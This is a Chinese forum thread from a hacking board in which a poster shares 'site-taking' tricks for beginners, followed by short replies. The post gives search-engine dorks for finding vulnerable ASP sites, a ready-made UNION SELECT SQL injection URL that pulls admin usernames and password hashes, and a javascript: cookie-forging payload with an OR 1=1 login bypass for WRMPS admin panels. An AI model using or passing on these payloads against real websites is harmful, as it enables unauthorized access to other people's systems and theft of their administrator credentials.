搜索

数据漏洞拿站(非原创很多是万人骑适合新手)

smallyang 该用户已被删除

漏洞1
谷歌 百度   搜索关键字:inurl:"HomeMarket.asp"(用引擎搜索即可)

在域名后面加: NewsType.asp?
SmallClass='%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20''='(然后再域名后面加上这句)里面的MD5需要自己解后台用御剑扫

(漏洞2)
Powered by WRMPS(同样搜素)

admin/admin_login.asp(加域名后面)这个是后台地址

javascript:alert(document.cookie="admin=managecode="+escape("WRMPS6")+"&pass="+escape("cbi")+"&admin="+escape("admin' or '1'='1' or '1'='1")+";path=/;");  (复制放在域名上面比如www.xxx.com/XXXXXXX右键全选然后直接放进去回车)

admin/admin_manage.asp(然后域名后面再放这个回车)如果站长没做修改就直接进去了
854955425 该用户已被删除
这是什么东东啊
854955425 该用户已被删除
这是什么东东啊
滥情 该用户已被删除
杨儿啊,你这让我..........
zeroday 该用户已被删除
潜水是一种美德,回帖是一种责任!
smallyang 该用户已被删除
滥情 发表于 2013-10-24 12:45
杨儿啊,你这让我..........

????????
ceshi6789 该用户已被删除
路过学习一下
dbzmzm 该用户已被删除
谢谢楼主了,我是新手,我先使着,学习下 太感谢了